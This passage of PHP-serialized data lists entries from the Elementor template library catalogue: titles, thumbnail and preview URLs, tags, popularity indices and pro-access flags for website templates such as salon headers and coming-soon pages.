Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/Footer.jpg\";s:12:\"tmpl_created\";i:1608622498;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/beauty-salon-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:32:\"[\"Beauty Salon\",\"Footer\",\"Hair\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:524;s:11:\"trend_index\";i:126;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:330;a:16:{s:4:\"tmpl\";i:1145;s:2:\"id\";i:16917;s:5:\"title\";s:22:\"Webinar &#8211; Events\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Webinar-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610466822;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:36:\"[\"Events\",\"Landing Pages\",\"Webinar\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:821;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:331;a:16:{s:4:\"tmpl\";i:1413;s:2:\"id\";i:24049;s:5:\"title\";s:33:\"ECO Shop &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-ECO-Shop.jpg\";s:12:\"tmpl_created\";i:1649882053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/eco-shop-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:110:\"[\"Aesthetic\",\"Business\",\"Creative\",\"Decor\",\"Health\",\"Help\",\"Lifestyle\",\"Products\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:332;a:16:{s:4:\"tmpl\";i:1129;s:2:\"id\";i:16545;s:5:\"title\";s:27:\"Beauty Salon &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/Header.jpg\";s:12:\"tmpl_created\";i:1608622495;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/beauty-salon-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:32:\"[\"Beauty Salon\",\"Hair\",\"Header\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:356;s:11:\"trend_index\";i:49;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:333;a:16:{s:4:\"tmpl\";i:1154;s:2:\"id\";i:17079;s:5:\"title\";s:42:\"Calls Volunteer &#8211; Social Involvement\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Calls-Volunteer.png\";s:12:\"tmpl_created\";i:1610631774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/calls-volunteer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:68:\"[\"Care\",\"Covid-19\",\"Help\",\"Involvement\",\"Landing Pages\",\"Volunteer\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:854;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:334;a:16:{s:4:\"tmpl\";i:1419;s:2:\"id\";i:24136;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Food-Blog.jpg\";s:12:\"tmpl_created\";i:1650990034;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:62:\"[\"Blog\",\"Business\",\"Coming Soon\",\"Cooking\",\"Education\",\"Food\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:335;a:16:{s:4:\"tmpl\";i:1142;s:2:\"id\";i:16836;s:5:\"title\";s:33:\"Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/01/Marketing-Agency-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610464490;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:74:\"[\"Agency\",\"Business\",\"Landing Pages\",\"Marketing\",\"Marketing Landing Page\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:816;s:11:\"trend_index\";i:787;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:336;a:16:{s:4:\"tmpl\";i:641;s:2:\"id\";i:7686;s:5:\"title\";s:12:\"Blog Posts 1\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2018/03/blog_posts.png\";s:12:\"tmpl_created\";i:1521558047;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/blog-posts-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:26:\"[\"Archive\",\"Blog\",\"posts\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:131;s:11:\"trend_index\";i:152;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:337;a:16:{s:4:\"tmpl\";i:1411;s:2:\"id\";i:24020;s:5:\"title\";s:35:\"Mobile App &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Mobile-App.jpg\";s:12:\"tmpl_created\";i:1649880955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/mobile-app-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"App\",\"Business\",\"Coding\",\"Computer\",\"Launch\",\"Mobile\",\"Under Construction\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:338;a:16:{s:4:\"tmpl\";i:1139;s:2:\"id\";i:16785;s:5:\"title\";s:42:\"Gym Promotion &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Gym-LP.jpg\";s:12:\"tmpl_created\";i:1610455496;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/gym-promotion-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:42:\"[\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:820;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:339;a:16:{s:4:\"tmpl\";i:1420;s:2:\"id\";i:24152;s:5:\"title\";s:32:\"Perfume Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Perfume-Shop.jpg\";s:12:\"tmpl_created\";i:1650990353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/perfume-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Business\",\"Coming Soon\",\"Cosmetics\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:340;a:16:{s:4:\"tmpl\";i:484;s:2:\"id\";i:5283;s:5:\"title\";s:9:\"Clients 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_white_2.png\";s:12:\"tmpl_created\";i:1520443478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/clients-1-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:294;s:11:\"trend_index\";i:202;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:341;a:16:{s:4:\"tmpl\";i:1185;s:2:\"id\";i:18492;s:5:\"title\";s:34:\"Bicycle Pre-Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bike-Landing-Page.png\";s:12:\"tmpl_created\";i:1617535552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bicycle-pre-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:34:\"[\"Bicycle\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:871;s:11:\"trend_index\";i:826;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:342;a:16:{s:4:\"tmpl\";i:487;s:2:\"id\";i:5306;s:5:\"title\";s:10:\"Clients 10\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_3.png\";s:12:\"tmpl_created\";i:1520443484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:657;s:11:\"trend_index\";i:581;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:343;a:16:{s:4:\"tmpl\";i:1418;s:2:\"id\";i:24126;s:5:\"title\";s:28:\"Skincare &#8211; Coming Soon\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Skincare.jpg\";s:12:\"tmpl_created\";i:1650989585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/skincare-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:128:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Coming Soon\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Services\",\"Skincare\",\"Treatment\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:344;a:16:{s:4:\"tmpl\";i:1181;s:2:\"id\";i:18349;s:5:\"title\";s:39:\"Virtual try-on glasses &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-8.png\";s:12:\"tmpl_created\";i:1614772569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/virtual-try-on-glasses-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:64:\"[\"Fashion\",\"Glasses\",\"Landing Pages\",\"Online Service\",\"Virtual\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:848;s:11:\"trend_index\";i:803;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:345;a:16:{s:4:\"tmpl\";i:491;s:2:\"id\";i:5341;s:5:\"title\";s:10:\"Clients 11\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_4.png\";s:12:\"tmpl_created\";i:1520443491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:603;s:11:\"trend_index\";i:633;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:346;a:16:{s:4:\"tmpl\";i:1410;s:2:\"id\";i:24004;s:5:\"title\";s:33:\"Skincare &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Skincare.jpg\";s:12:\"tmpl_created\";i:1649880534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/skincare-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:144:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Makeup\",\"Services\",\"Skincare\",\"Treatment\",\"Under Construction\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:347;a:16:{s:4:\"tmpl\";i:1172;s:2:\"id\";i:17458;s:5:\"title\";s:31:\"Moving Company &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Moving-Company.png\";s:12:\"tmpl_created\";i:1612727025;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/moving-company-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"Landing Pages\",\"Movers\",\"Moving\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:826;s:11:\"trend_index\";i:767;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:348;a:16:{s:4:\"tmpl\";i:488;s:2:\"id\";i:5315;s:5:\"title\";s:10:\"Clients 12\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4-1.png\";s:12:\"tmpl_created\";i:1520443486;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:485;s:11:\"trend_index\";i:263;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:349;a:16:{s:4:\"tmpl\";i:1415;s:2:\"id\";i:24092;s:5:\"title\";s:29:\"Vase Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Vase-Shop.jpg\";s:12:\"tmpl_created\";i:1650988613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/vase-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:350;a:16:{s:4:\"tmpl\";i:1186;s:2:\"id\";i:18517;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Food-Blog.png\";s:12:\"tmpl_created\";i:1617539897;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:45:\"[\"Blog\",\"Coming Soon\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:844;s:11:\"trend_index\";i:672;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:351;a:16:{s:4:\"tmpl\";i:490;s:2:\"id\";i:5333;s:5:\"title\";s:10:\"Clients 13\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_6.png\";s:12:\"tmpl_created\";i:1520443489;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:234;s:11:\"trend_index\";i:128;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:352;a:16:{s:4:\"tmpl\";i:1167;s:2:\"id\";i:17379;s:5:\"title\";s:33:\"IT Service &#8211; Online Service\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-IT-Service.png\";s:12:\"tmpl_created\";i:1612713022;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/it-service-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:41:\"[\"IT\",\"Landing Pages\",\"Remote\",\"Support\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:806;s:11:\"trend_index\";i:634;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:353;a:16:{s:4:\"tmpl\";i:1248;s:2:\"id\";i:22134;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647176713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:354;a:16:{s:4:\"tmpl\";i:496;s:2:\"id\";i:5389;s:5:\"title\";s:10:\"Clients 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_9.png\";s:12:\"tmpl_created\";i:1520443501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:407;s:11:\"trend_index\";i:307;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:355;a:16:{s:4:\"tmpl\";i:1189;s:2:\"id\";i:18560;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1617542761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/lp/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:843;s:11:\"trend_index\";i:561;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:356;a:16:{s:4:\"tmpl\";i:1225;s:2:\"id\";i:21041;s:5:\"title\";s:41:\"Business Consulting Company &#8211; About\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/8-About-Business-Consulting-Company.jpg\";s:12:\"tmpl_created\";i:1638797560;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/business-consulting-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Coach\",\"Collaboration\",\"Consulting\",\"Life Coach\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:357;a:16:{s:4:\"tmpl\";i:486;s:2:\"id\";i:5298;s:5:\"title\";s:10:\"Clients 15\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_white_3.png\";s:12:\"tmpl_created\";i:1520443482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:465;s:11:\"trend_index\";i:520;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:358;a:16:{s:4:\"tmpl\";i:1187;s:2:\"id\";i:18528;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1617541784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:872;s:11:\"trend_index\";i:819;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:359;a:16:{s:4:\"tmpl\";i:1243;s:2:\"id\";i:21135;s:5:\"title\";s:28:\"Construction &#8211; Service\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/13-Service-Construction.jpg\";s:12:\"tmpl_created\";i:1638823202;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Architecture\",\"Construction\",\"Faq\",\"Services\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:360;a:16:{s:4:\"tmpl\";i:495;s:2:\"id\";i:5381;s:5:\"title\";s:10:\"Clients 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_9.png\";s:12:\"tmpl_created\";i:1520443499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/clients-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:198;s:11:\"trend_index\";i:168;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:361;a:16:{s:4:\"tmpl\";i:1174;s:2:\"id\";i:17504;s:5:\"title\";s:29:\"Hair Stylist &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-3.png\";s:12:\"tmpl_created\";i:1612883014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/hair-stylist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:59:\"[\"Business\",\"Hair\",\"hairdresser\",\"Landing Pages\",\"Stylist\"]\";s:10:\"menu_order\";i:57;s:16:\"popularity_index\";i:840;s:11:\"trend_index\";i:806;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:362;a:16:{s:4:\"tmpl\";i:1223;s:2:\"id\";i:20981;s:5:\"title\";s:37:\"Creative Digital Agency &#8211; About\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2021/12/6-About-Creative-Digital-Agency.jpg\";s:12:\"tmpl_created\";i:1638789303;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/creative-digital-agency-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"About\",\"Advisor\",\"Creative\",\"Creative 